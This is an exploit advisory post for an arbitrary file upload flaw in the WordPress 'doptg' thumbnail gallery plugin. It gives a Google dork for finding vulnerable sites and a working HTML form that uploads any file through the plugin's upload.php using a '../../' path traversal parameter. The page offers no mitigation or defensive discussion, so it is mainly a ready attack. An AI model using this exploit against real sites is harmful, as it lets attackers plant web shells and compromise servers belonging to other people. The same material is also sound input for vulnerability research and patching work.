facebook facebook twitter rss

Wordpress doptg plugin file upload vulnerability

Author: Felipe M , Published: 26-09-2014
# Exploit Title: Wordpress doptg plugin file upload vulnerability

# Google Dork: inurl:/wp-content/plugins/doptg/

# Date: 25-09-2014

# Author: Felipe M.

# Author E-mail : secure@gudwal.com

# Category: webapps

# platform: php

# exploit

# software Download: http://www.luchosarmiento.com/wp/wp-content/uploads/doptg.zip

# Vendor: http://codecanyon.net/item/thumbnail-gallery-wordpress-plugin/294024?ref=MariusCristianDonea

<div style="padding: 10px;"> <form action="http://[SERVER]/[path]/wp-content/plugins/doptg/libraries/php/upload.php?path=../../" enctype="multipart/form-data" method="post"> <input type="hidden" name="doptg_image" value="doptg_image"> Upload File: <input type="file" name="doptg_image"> <input type="submit" class="ui-button ui-widget ui-state-default ui-corner-all" value="Upload"> </form> </div>

Like us on Facebook :